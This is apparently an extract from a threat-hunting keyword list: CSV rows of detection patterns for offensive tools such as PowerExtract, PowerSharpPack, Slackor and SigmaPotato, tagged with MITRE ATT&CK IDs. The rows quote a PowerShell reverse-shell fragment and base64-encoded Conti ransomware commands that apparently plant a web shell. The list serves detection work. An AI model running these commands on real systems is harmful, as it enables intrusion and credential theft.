"*PowerSCCM.psm1*",".{0,1000}PowerSCCM\.psm1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55172"
"*PowerSCCM-master*",".{0,1000}PowerSCCM\-master.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55173"
"*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","55174"
"*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","55175"
"*PowerSharpBinaries*",".{0,1000}PowerSharpBinaries.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55176"
"*PowerSharpPack.ps1*",".{0,1000}PowerSharpPack\.ps1.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55177"
"*PowerSharpPack-master*",".{0,1000}PowerSharpPack\-master.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55178"
"*PowerShdll*",".{0,1000}PowerShdll.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","N/A","10","1794","256","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z","55179"
"*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**",".{0,1000}powershell\s.{0,1000}C\:\\Users\\Public\\.{0,1000}\.exe.{0,1000}\sforfiles\.exe\s\/p\s.{0,1000}\\system32\s.{0,1000}\.exe.{0,1000}.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","55180"
"*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*",".{0,1000}powershell\s.{0,1000}Get\-EventLog\s\-LogName\ssecurity\s\-Newest\s500\s\|\swhere\s\{\$_\.EventID\s\-eq\s4624\}\s\|\sformat\-list\s\-property\s.{0,1000}\s\|\sfindstr.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55181"
"*powershell -c *New-Object System.Net.Sockets.TCPClient(""*$sendback = (iex *$data* 2>&1 | Out-String*",".{0,1000}powershell\s\-c\s.{0,1000}New\-Object\sSystem\.Net\.Sockets\.TCPClient\(\"".{0,1000}\$sendback\s\=\s\(iex\s.{0,1000}\$data.{0,1000}\s2\>\&1\s\|\sOut\-String.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","55185"
"*powershell -e $env:SigmaBootstrap*",".{0,1000}powershell\s\-e\s\$env\:SigmaBootstrap.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","55187"
"*powershell -enc ((Get-PrintJob XPS).documentname -join*",".{0,1000}powershell\s\-enc\s\(\(Get\-PrintJob\sXPS\)\.documentname\s\-join.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","55188"
"*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55189"
"*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55190"
"*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #2","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55191"
"*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #6","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55192"
"*powershell -enc dwBoAG8AYQBtAGkA*",".{0,1000}powershell\s\-enc\sdwBoAG8AYQBtAGkA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #1","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008  - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55193"
"*powershell -enc JABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAVwBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANABOAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*",".{0,1000}powershell\s\-enc\sJABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAVwBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANABOAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB